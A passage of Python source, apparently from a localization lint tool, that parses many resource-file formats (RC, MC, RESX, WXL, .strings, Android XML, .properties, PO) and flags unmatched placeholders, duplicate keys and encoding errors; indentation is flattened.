if IssueName.unmatched_placeholder.value not in self.detect_issues:
return
LOG.info("Detecting unmatched placeholders in localized resource files...")
placeholder_pattern = self.get_placeholder_pattern()
if not placeholder_pattern:
LOG.info("Placeholder pattern is not defined, skip detection")
return
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
base_key_value_pairs = base_res_file.key_value_pairs
sorted_localized_res_files = sorted(res_file_group.localized_res_files.items())
for base_key, base_value in sorted(base_key_value_pairs.items()):#If this sorting cosumes a lot of time, sorting detection result instead
base_placeholders = {}
#LOG.info("scanning string: {0}".format(base_value))
for tokens, start, end in placeholder_pattern.scanString(base_value):
placeholder = tokens[0]
#LOG.info(placeholder)
if placeholder in base_placeholders.keys():
base_placeholders[placeholder] += 1
else:
base_placeholders[placeholder] = 1
if not base_placeholders:
continue
for language, res_file in sorted_localized_res_files:
target_keys = res_file.keys
target_key_value_pairs = res_file.key_value_pairs
target_placeholders = {}
if base_key in target_keys:
target_value = target_key_value_pairs[base_key]
for tokens, start, end in placeholder_pattern.scanString(target_value):
placeholder = tokens[0]
if placeholder in target_placeholders.keys():
target_placeholders[placeholder] += 1
else:
target_placeholders[placeholder] = 1
if not base_placeholders == target_placeholders:
#LOG.info(",".join(base_placeholders.keys()) + "---" + ",".join(target_placeholders.keys()))
issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.unmatched_placeholder, description = Description.unmatched_placeholder, severity = Severity.error, context = Context.unmatched_placeholder.value.format(base_key, base_value, target_value))
self.issues.add(issue)
def detect_unused_and_undefined_keys(self):
pass
def detect_encoding_errors(self):
if IssueName.encoding_error.value not in self.detect_issues:
return
LOG.info("Detecting resource file encoding errors...")
for res_file_group in self.res_file_groups:
for language, res_file in sorted(res_file_group.res_files.items()):
if res_file.encoding_error:
issue = Issue(file = res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.encoding_error, description = Description.encoding_error, severity = Severity.error, context = Context.encoding_error.value.format(res_file.encoding_error))
self.issues.add(issue)
class RcResFile(BaseResFile):
def parse(self, parsing_patterns):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
string_table, key_value_pair = parsing_patterns
for table_content_token, start_location, end_location in string_table.scanString(data):
for tokens, start, end in key_value_pair.scanString(table_content_token[0]):
for token in tokens:
key = token[0]
value = token[1]
pure_value = value[1:-1]
#compare values to decide whether it is duplicated, workaround for Receiver for Windows since there are many #ifdef statements
if key in self.keys and pure_value == self.key_value_pairs[key]:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class RcResDetector(BaseResDetector):
def get_parsing_patterns(self):
key = PY.Word(PY.alphas + "_", PY.alphanums + "_") | PY.Word(PY.nums)
value = PY.dblQuotedString
define_patterns = PY.Regex(R"#ifdef.*") | PY.Regex(R"#ifndef.*") | PY.Regex(R"#elif.*") | PY.Regex(R"#endif.*") # add for Receiver for Windows
key_value_pair = (PY.Group(key + value) | define_patterns.suppress()).ignore(PY.cppStyleComment).parseWithTabs()
white_char = PY.Word(string.whitespace, exact = 1)
string_table = (white_char + PY.Literal("STRINGTABLE") + white_char).suppress() + PY.SkipTo((white_char + PY.Literal("BEGIN") + white_char) | PY.Literal("{"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True).suppress() + PY.originalTextFor(PY.SkipTo((white_char + PY.Literal("END") + (white_char | PY.stringEnd)) | PY.Literal("}"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True))
#string_table_sign = (white_char + PY.Literal("STRINGTABLE") + white_char).suppress() + PY.SkipTo(PY.Literal("{"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True).suppress() + PY.originalTextFor(PY.SkipTo(PY.Literal("}"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True))
string_table = string_table.ignore(PY.cppStyleComment).parseWithTabs().leaveWhitespace()
return string_table, key_value_pair
def get_placeholder_pattern(self):
#reference: http://msdn.microsoft.com/en-us/library/windows/desktop/ms679351%28v=vs.85%29.aspx, http://msdn.microsoft.com/en-us/library/56e442dc.aspx
positive_integer = PY.Word("123456789", PY.nums)
integer = PY.Literal("0") | positive_integer
flags = PY.Word("-+ #0")
width = integer | PY.Literal("*")
precision = PY.Literal(".") + width
type_prefix = PY.Literal("ll") | PY.Literal("l") | PY.Literal("I32") | PY.Literal("I64") | PY.Literal("I") | PY.Literal("h") | PY.Literal("w")
type_flag = PY.Word("cCdiouxXeEfgGaAnpsSZ", exact = 1)
format_string_body = PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(type_prefix) + type_flag
special_characters = PY.Combine(PY.Literal("%") + PY.Word("0% .!nrt", exact = 1))
format_string = PY.Combine(PY.Literal("%") + format_string_body)
numbered_format_string = PY.Combine(PY.Literal("%") + positive_integer + PY.Optional(PY.Literal("!") + format_string_body + PY.Literal("!")))
placeholder_pattern = PY.originalTextFor(numbered_format_string | format_string | special_characters)
return placeholder_pattern
class Rc2ResFile(RcResFile):
pass
class Rc2ResDetector(RcResDetector):
pass
class McResFile(BaseResFile):
#reference : http://msdn.microsoft.com/en-us/library/windows/desktop/dd996906(v=vs.85).aspx
def parse(self, parsing_patterns):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
key_value_pair = parsing_patterns
for tokens, start_location, end_location in key_value_pair.scanString(data):
key = tokens[0]
value = tokens[1]
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class McResDetector(BaseResDetector):
def get_parsing_patterns(self):
comment = PY.Regex(R";/(?:\*(?:[^*]*;\*+)+?/|/[^\n]*(?:\n[^\n]*)*?(?:(?<!\\)|\Z))")
#comment = PY.Regex(R";.*") #this kind of comments are used in some projects
variable = PY.Word(PY.alphanums + "_", PY.alphanums + "_")
message_key = PY.Literal("MessageId") + PY.Literal("=") + PY.Optional(PY.Optional(PY.Literal("+")) + variable)
severity = PY.Literal("Severity") + PY.Literal("=") + variable
facility = PY.Literal("Facility") + PY.Literal("=") + variable
symbolic_name = (PY.Literal("SymbolicName") + PY.Literal("=")).suppress() + variable
output_base = PY.Literal("OutputBase") + PY.Literal("=") + PY.Optional(PY.Literal("{")) + variable + PY.Optional(PY.Literal("}"))
language = PY.Literal("Language") + PY.Literal("=") + variable
message_value = PY.SkipTo(PY.lineStart + PY.Literal(".")).setParseAction(lambda s, l, t: t[0].strip())
#comment out below pattern since severity/facility/symbolic items can be in any order in reality, not like MSDN says...
#key_value_pair = message_key.suppress() + PY.Optional(severity).suppress() + PY.Optional(facility).suppress() + symbolic_name + PY.Optional(output_base).suppress() + PY.Optional(language).suppress() + message_value
careless_item = language | severity | facility | output_base
key_value_pair = message_key.suppress() + PY.ZeroOrMore(careless_item).suppress() + symbolic_name + PY.ZeroOrMore(careless_item).suppress() + message_value
return key_value_pair.ignore(comment).parseWithTabs()
def get_placeholder_pattern(self):
#reference : http://msdn.microsoft.com/en-us/library/windows/desktop/dd996906(v=vs.85).aspx and the links ont the page
positive_integer = PY.Word("123456789", PY.nums)
integer = PY.Literal("0") | positive_integer
flags = PY.Word("-#0")
width = integer
precision = PY.Literal(".") + PY.Optional(integer)
type_flag = PY.Word("h", "cCdsSu", exact = 2) | PY.Word("l", "cCdisSuxX", exact = 2) | PY.Word("cCdipsSu", exact = 1)
format_string_body = PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + type_flag
special_characters = PY.Combine(PY.Literal("%") + PY.Word("0.!%nbr", exact = 1))
numbered_format_string = PY.Combine(PY.Literal("%") + positive_integer + PY.Optional(PY.Literal("!") + format_string_body + PY.Literal("!")))
placeholder_pattern = PY.originalTextFor(numbered_format_string | special_characters)
return placeholder_pattern
class ResxResFile(BaseResFile):
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
root = ET.fromstring(data)
#escape_pattern = None # need to add whether there is an escape error, no need for now since parseError will be thrown in current implementation
for elem in root.findall("data"):
key = elem.get("name")
if key is None:
continue
#filter strings from all values parsed
if ("." in key) and (not key.endswith(".Text")):
continue
#if there is no child named "value" under "data", the actual value in C# project is null, we set it to "" in order to save effort to handle it
#if there is no text in "value" node, the actual value in C# project is ""
value = ""
sub_elem = elem.find("value")
if sub_elem != None:
value = "".join(sub_elem.itertext())
if key in self.keys:
self.duplicate_keys.append(key)
#if escape_pattern.match(value):
# self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class ResxResDetector(BaseResDetector):
def is_translation_necessary(self, value):
return (BaseResDetector.is_translation_necessary(self, value) and (not "PublicKeyToken" in value))
def get_placeholder_pattern(self):
return PY.Literal("{").suppress() + PY.Word(PY.nums) + PY.Literal("}").suppress()
class ReswResFile(ResxResFile):
pass
class ReswResDetector(ResxResDetector):
pass
class WxlResFile(BaseResFile):
# Maybe the most effeicent way is to get the last five character of the pure file name when determining the language based on the file name
def get_language(self):
sub_names = self.file.lower().split(".")
try:
sub_name = sub_names[-2]
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
except IndexError:
pass
for sub_name in sub_names:
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
#sometimes the file name is like agee_zh-CN.wxl
sub_names = self.file.lower().replace("." + self.extension, "").split("_")
try:
sub_name = sub_names[-1]
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
except IndexError:
pass
for sub_name in sub_names:
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
#sometimes the file name is like Dmc-de-de.wxl
try:
sub_name = self.file.lower()[-9:-4]
if sub_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_name]
except Exception:
pass
sub_dirs = self.directory.lower().split(os.sep)
try:
sub_dir = sub_dirs[-1]
if sub_dir in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_dir]
except IndexError:
pass
#Is the following necessary? Do we need to decide whether the other sub directory is language id besides the last sub directory?
for sub_dir in sub_dirs:
if sub_dir in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_dir]
return BASE_LANGUAGE
def get_group_id(self):
#Maybe the most efficient way to get adjusted file name is sef.file[0:-9]
sub_names = self.file.split(".")
file_adjusted = ""
for sub_name in sub_names:
if not sub_name.lower() in STANDARDIZED_LANGUAGES.keys():
file_adjusted += sub_name
#sometimes the file name is like agee_zh-CN.wxl
if "".join(sub_names) == file_adjusted:
file_adjusted = ""
sub_names = self.file.replace("." + self.extension, "").split("_")
for sub_name in sub_names:
if not sub_name.lower() in STANDARDIZED_LANGUAGES.keys():
file_adjusted += sub_name
file_adjusted = file_adjusted + "." + self.extension
#sometimes the file name is like Dmc-de-de.wxl
if ("_".join(sub_names) + "." + self.extension) == file_adjusted:
file_adjusted = self.file[0:-9]
sub_dirs = self.directory.split(os.sep)
dir_adjusted = sub_dirs
index = 0
for sub_dir in sub_dirs:
if sub_dir.lower() in STANDARDIZED_LANGUAGES.keys():
dir_adjusted.remove(sub_dir)
break
index += 1
return file_adjusted, os.sep.join(dir_adjusted), index
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
root = ET.fromstring(data)
#escape_pattern = None # need to add whether there is an escape error, no need for now since parseError will be thrown in current implementation
for elem in root.iter():
if elem.tag.endswith("String"):
key = elem.get("Id")
if key is None:
continue
value = "".join(elem.itertext())
if key in self.keys:
self.duplicate_keys.append(key)
#if escape_pattern.match(value):
# self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class WxlResDetector(BaseResDetector):
def get_placeholder_pattern(self):
variable = PY.Word(PY.alphas + "_", PY.alphanums + "_")
number = PY.Literal("0") | PY.Word("123456789", PY.nums)
placeholder_pattern = PY.originalTextFor((PY.Literal("[") + (variable | number) + PY.Literal("]")) | (PY.Literal("{") + PY.Literal("\\") + variable + PY.Literal("}")))
return placeholder_pattern
class StrResFile(BaseResFile):
def get_language(self):
sub_names = os.path.basename(self.directory).lower().split(".")
if len(sub_names) > 1:
language = sub_names[-2]
if language in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[language]
else:
for language in sub_names:
if language in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[language]
return BASE_LANGUAGE
else:
return BASE_LANGUAGE
def get_group_id(self):
return self.file, os.path.dirname(self.directory)
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
variable = PY.Word(PY.alphas + "_", PY.alphanums + "_")
key_pattern = variable | PY.dblQuotedString
value_pattern = PY.dblQuotedString
key_value_pair = key_pattern + PY.Literal("=").suppress() + value_pattern + PY.Literal(";").suppress()
escape_pattern = re.compile(".*(?<!\\\)\".*")
for token, start_location, end_location in key_value_pair.ignore(PY.cppStyleComment).scanString(data):
key = token[0]
value = token[1]
pure_value = value[1:-1]
if key in self.keys:
self.duplicate_keys.append(key)
if escape_pattern.match(pure_value):
self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class StrResDetector(BaseResDetector):
def get_placeholder_pattern(self):
#reference: http://pubs.opengroup.org/onlinepubs/009695399/functions/printf.html, https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/Strings/Articles/formatSpecifiers.html
#can only detect placeholders, do not make sure they are legal
positive_integer = PY.Word("123456789", PY.nums)
index = positive_integer + PY.Literal("$")
flags = PY.Word("'-+ #0")
width = positive_integer | (PY.Literal("*") + PY.Optional(positive_integer + PY.Literal("$")))
precision = PY.Literal(".") + width
length_modifier = PY.Literal("hh") | PY.Literal("ll") | PY.Word("hljztqL", exact = 1)
conversion_specifier = PY.Word("@sdiouUxXfFeEgGaAcpnCS%", exact = 1)
placeholder_pattern = PY.originalTextFor(PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(length_modifier) + conversion_specifier))
return placeholder_pattern
class XibResFile(StrResFile):
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
self.keys.add("KeyPlaceholder")
self.values.append("ValuePlaceholder")
self.key_value_pairs["KeyPlaceholder"] = "ValuePlaceholder"
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class XibResDetector(BaseResDetector):
def get_detect_issues(self):
if self.config.use_user_config:
LOG.info("Reading issue types to be detected from configuration file...")
self.detect_issues = getattr(self.config.config_module, self.config.detect_issues_attrs[self.res_file_type], [])
else:
LOG.info("Getting default issue types to be detected...")
self.detect_issues = []
class XmlResFile(BaseResFile):
def get_language(self):
sub_names = os.path.basename(self.directory).lower().split("-")
count = len(sub_names)
if count == 1:
return BASE_LANGUAGE
elif count > 1:
for i in range(1, count):
language = sub_names[i]
if language in STANDARDIZED_LANGUAGES.keys():
result = STANDARDIZED_LANGUAGES[language]
if i + 1 < count and sub_names[i + 1].startswith("r"):
language = sub_names[i] + "-" + sub_names[i + 1]
if language in STANDARDIZED_LANGUAGES.keys():
result = STANDARDIZED_LANGUAGES[language]
return result
return BASE_LANGUAGE
else:
LOG.critical("A fatal error occurred when determining the language of file '{path}'".format(path = self.path))
quit_application(-1)
def get_group_id(self):
sub_names = os.path.basename(self.directory).lower().split("-")
base_name_adjusted = ""
count = len(sub_names)
region_flag = False
for i in range(count):
sub_name = sub_names[i]
if (not sub_name in STANDARDIZED_LANGUAGES.keys()) and (not region_flag):
base_name_adjusted += sub_name
elif not region_flag:
if i + 1 < count and sub_names[i + 1].startswith("r"):
language = sub_name + "-" + sub_names[i + 1]
if language in STANDARDIZED_LANGUAGES.keys():
region_flag = True
else:
region_flag = False
return self.file, base_name_adjusted, os.path.dirname(self.directory)
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
def get_value_info(value):
if value and len(value) >1:
if value[0] == '"' and value[-1] == '"':
return value[1:-1], '"'
elif value[0] == "'" and value[-1] == "'":
return value[1:-1], "'"
else:
return value, None
else:
return value, None
root = ET.fromstring(data)
#apostrophe_pattern = re.compile(".*(?<!\\\)'.*")
#quote_pattern = re.compile(".*(?<!\\\)\".*")
for elem in root.iter():
if elem.tag == "string":
key = elem.get("name")
if key is None:
continue
value = "".join(elem.itertext())
pure_value, opener_closer = get_value_info(value)
if key in self.keys:
self.duplicate_keys.append(key)
#if (apostrophe_pattern.match(value) and (value[0] != "\"" or value[-1] != "\"")) or (quote_pattern.match(value) and (value[0] != "'" or value[-1] != "'")):
#self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
elif elem.tag == "string-array":
key_prefix = elem.get("name")
if key_prefix is None:
continue
index = 0
for sub_elem in elem.findall("item"):
key = key_prefix + "#" + str(index)
index = index + 1
value = "".join(sub_elem.itertext())
pure_value, opener_closer = get_value_info(value)
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
elif elem.tag == "plurals":
key_prefix = elem.get("name")
if key_prefix is None:
continue
for sub_elem in elem.findall("item"):
quantity = sub_elem.get("quantity")
if quantity is None:
continue
key = key_prefix + "#" + quantity
value = "".join(sub_elem.itertext())
pure_value, opener_closer = get_value_info(value)
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class XmlResDetector(BaseResDetector):
def get_placeholder_pattern(self):
#reference : http://blog.csdn.net/weiyijijing/article/details/8082366
#need to check official document in future
positive_integer = PY.Word("123456789", PY.nums)
index = positive_integer + PY.Literal("$")
sign = PY.Word("+- 0,(#<")
string_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Literal("s"))
integer_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(sign) + PY.Optional(positive_integer) + PY.Word("doxX", exact = 1))
float_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(sign) + PY.Optional(positive_integer) + PY.Optional("." + positive_integer) + PY.Word("eEfgGaA", exact = 1))
character_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(PY.Literal("-")) + PY.Literal("c"))
percent_pattern = PY.Literal("%%")
newline_pattern = PY.Literal("%n")
time_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Literal("t") + PY.Word("cFDrTRHIklMSLNpzZsQBbhAaCYyjmde", exact = 1))
placeholder_pattern = PY.originalTextFor(string_pattern | percent_pattern | newline_pattern | integer_pattern | float_pattern | character_pattern | time_pattern)
return placeholder_pattern
class ProResFile(BaseResFile):
def get_language(self):
pure_name_end = 0 - len(".properties")
sub_names = self.file[0:pure_name_end].lower().split("_")
count = len(sub_names)
if count == 1:
if sub_names[0] in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[sub_names[0]]
return BASE_LANGUAGE
elif count > 1:
language = sub_names[-2] + "-" + sub_names[-1]
if language in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[language]
else:
language = sub_names[-1]
if language in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[language]
else:
return BASE_LANGUAGE
else:
LOG.critical("A fatal error occurred when determining the language of file '{path}'".format(path = self.path))
quit_application(-1)
def get_group_id(self):
pure_name_end = 0 - len(".properties")
sub_names = self.file[0:pure_name_end].lower().split("_")
file_adjusted = ""
count = len(sub_names)
if count == 1:
if sub_names[0] not in STANDARDIZED_LANGUAGES.keys():
file_adjusted = sub_names[0]
elif count > 1:
language = sub_names[-2] + "-" + sub_names[-1]
if language in STANDARDIZED_LANGUAGES.keys():
file_adjusted = "_".join(sub_names[0:-2])
else:
language = sub_names[-1]
if language in STANDARDIZED_LANGUAGES.keys():
file_adjusted = "_".join(sub_names[0:-1])
else:
file_adjusted = "_".join(sub_names[0:])
else:
LOG.critical("A fatal error occurred when determining the language of file '{path}'".format(path = self.path))
quit_application(-1)
return file_adjusted, self.directory
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
normal_white_spaces = " \t\f"
white_spaces = " \t\f\r\n"
comment_starts = "#!"
key_terminators = ":=" + normal_white_spaces
class LineType(Enum):
comment = 0
blank = 1
natural = 2
logic = 3
def is_escape_character(line_string, index):
if index < 0:
return False
if line_string[index] != "\\":
return False
index -= 1
backslash_count = 1
while index >= 0 and line_string[index] == "\\":
index -= 1
backslash_count += 1
if backslash_count % 2:
return True
else:
return False
def get_line_information(line_string):
line_type = None
pure_len = len(line_string)
for char in line_string:
if char not in white_spaces:
if char in comment_starts:
line_type = LineType.comment
else:
if line_string.endswith("\r\n"):
if is_escape_character(line_string, pure_len - 3):
line_type = LineType.logic
pure_len -= 3
if line_string.lstrip(normal_white_spaces) == "\\\r\n":
line_type = LineType.blank
pure_len = 0
else:
line_type = LineType.natural
pure_len -= 2
elif line_string.endswith("\n") or line_string.endswith("\r"):
if is_escape_character(line_string, pure_len - 2):
line_type = LineType.logic
pure_len -= 2
tailing_line_string = line_string.lstrip(normal_white_spaces)
if tailing_line_string == "\\\n" or tailing_line_string == "\\\r":
line_type = LineType.blank
pure_len = 0
else:
line_type = LineType.natural
pure_len -= 1
else:
raise Exception("Unexpected line end detected")
break
else:
line_type = LineType.blank
pure_len = 0
return line_type, pure_len
def parse_start_from_key(line_string, pure_len):
key_start = 0
value_end = 0
value = ""
is_key_uncompleted = False
while key_start < pure_len:
if line_string[key_start] not in normal_white_spaces:
break
key_start += 1
else:
raise Exception("No non-whitespace character found, this should not happen")
key_end = key_start
while key_end < pure_len:
if (line_string[key_end] in key_terminators) and (not is_escape_character(line_string, key_end - 1)):
break
key_end += 1
else:
is_key_uncompleted = True
return line_string[key_start:key_end], value, is_key_uncompleted
value_start = key_end
symbol_not_found = True
while value_start < pure_len:
if line_string[value_start] in normal_white_spaces:
value_start += 1
elif symbol_not_found and line_string[value_start] in "=:":
symbol_not_found = False
value_start += 1
else:
break
if value_start == pure_len:
value_start = 0
value_end = 0
else:
value_end = pure_len
return line_string[key_start:key_end], line_string[value_start:value_end], is_key_uncompleted
def parse_start_from_value(line_string, pure_len):
value_start = 0
value_end = 0
while value_start < pure_len:
if line_string[value_start] in normal_white_spaces:
value_start += 1
else:
break
if value_start == pure_len:
raise Exception("No non-whitespace character found, this should not happen")
else:
value_end = pure_len
return line_string[value_start:value_end]
line_strings = data.splitlines(keepends = True)
if not (line_strings[-1].endswith("\n") or line_strings[-1].endswith("\r")):
line_strings[-1] += "\n"
line_count = len(line_strings)
line_index = 0
last_line_type = LineType.natural
is_key_uncompleted = True
key = ""
value = ""
while line_index < line_count:
line_string = line_strings[line_index]
line_type, pure_len = get_line_information(line_string)
if line_type == LineType.blank:
line_index += 1
elif line_type == LineType.comment:
line_index += 1
elif line_type == LineType.natural:
if last_line_type == LineType.natural:
key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len)
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
elif last_line_type == LineType.logic:
if is_key_uncompleted:
partial_key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len)
key += partial_key
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
else:
partial_value = parse_start_from_value(line_string, pure_len)
value += partial_value
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
else:
raise Exception("Unexpected line type")
last_line_type = LineType.natural
line_index += 1
elif line_type == LineType.logic:
if last_line_type == LineType.natural:
key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len)
elif last_line_type == LineType.logic:
if is_key_uncompleted:
partial_key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len)
key += partial_key
else:
partial_value = parse_start_from_value(line_string, pure_len)
value += partial_value
else:
raise Exception("Unexpected line type")
last_line_type = LineType.logic
line_index += 1
else:
raise Exception("Unexpected line type, this should not happen")
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class ProResDetector(BaseResDetector):
#[TODO]http://docs.oracle.com/javase/tutorial/i18n/format/messageFormat.html, http://docs.oracle.com/javase/8/docs/api/java/text/MessageFormat.html
def get_placeholder_pattern(self):
return PY.Literal("{").suppress() + PY.Word(PY.nums) + PY.Literal("}").suppress()
class PoResFile(BaseResFile):
#reference: http://pology.nedohodnik.net/doc/user/en_US/ch-poformat.html & http://www.gnu.org/software/gettext/manual/html_node/index.html
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
#TODO Support plurals
string_pattern = PY.OneOrMore(PY.dblQuotedString.copy()).setParseAction(lambda s, l, t: "".join([i[1:-1] for i in t]))
key_value_pair = PY.Optional(PY.Literal("msgctxt").suppress() + string_pattern) + PY.Literal("msgid").suppress() + string_pattern + PY.Literal("msgstr").suppress() + string_pattern
for tokens, start, end in key_value_pair.ignore(PY.pythonStyleComment).parseWithTabs().scanString(data):
if len(tokens) == 3:
key = tokens[0] + "#" + tokens[1]
value = tokens[2]
else:
key = tokens[0]
value = tokens[1]
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class PoResDetector(BaseResDetector):
#Since only this function is overrided and the logic is the same as that in StrResDetector, this class can derive StrResDetector to reuse code
def get_placeholder_pattern(self):
#reference: http://pubs.opengroup.org/onlinepubs/009695399/functions/printf.html
positive_integer = PY.Word("123456789", PY.nums)
index = positive_integer + PY.Literal("$")
flags = PY.Word("'-+ #0")
width = positive_integer | (PY.Literal("*") + PY.Optional(positive_integer + PY.Literal("$")))
precision = PY.Literal(".") + width
length_modifier = PY.Literal("hh") | PY.Literal("ll") | PY.Word("hljztqL", exact = 1)
conversion_specifier = PY.Word("@sdiouUxXfFeEgGaAcpnCS%", exact = 1)
placeholder_pattern = PY.originalTextFor(PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(length_modifier) + conversion_specifier))
return placeholder_pattern
class TokResFile(BaseResFile):
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
digit_value = PY.Word(string.digits + string.punctuation + string.whitespace).leaveWhitespace().parseWithTabs()
key_value_pair = PY.originalTextFor(PY.Literal("[[") + (PY.Word(PY.nums) + PY.Literal("|")) * 5 + PY.dblQuotedString + PY.Literal("]]")) + PY.Literal("=").suppress() + PY.SkipTo(PY.lineEnd)
for tokens, start, end in key_value_pair.parseWithTabs().scanString(data):
key = tokens[0]
value = tokens[1]
if not value:
continue
try:
digit_value.parseString(value, parseAll = True)
except PY.ParseException:
pass
else:
continue
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class TokResDetector(BaseResDetector):
#Since only this function is overrided and the logic is the same as that in StrResDetector, this class can derive StrResDetector to reuse code
def get_placeholder_pattern(self):
#reference: http://pubs.opengroup.org/onlinepubs/009695399/functions/printf.html
positive_integer = PY.Word("123456789", PY.nums)
index = positive_integer + PY.Literal("$")
flags = PY.Word("'-+ #0")
width = positive_integer | (PY.Literal("*") + PY.Optional(positive_integer + PY.Literal("$")))
precision = PY.Literal(".") + width
length_modifier = PY.Literal("hh") | PY.Literal("ll") | PY.Word("hljztqL", exact = 1)
conversion_specifier = PY.Word("@sdiouUxXfFeEgGaAcpnCS%", exact = 1)
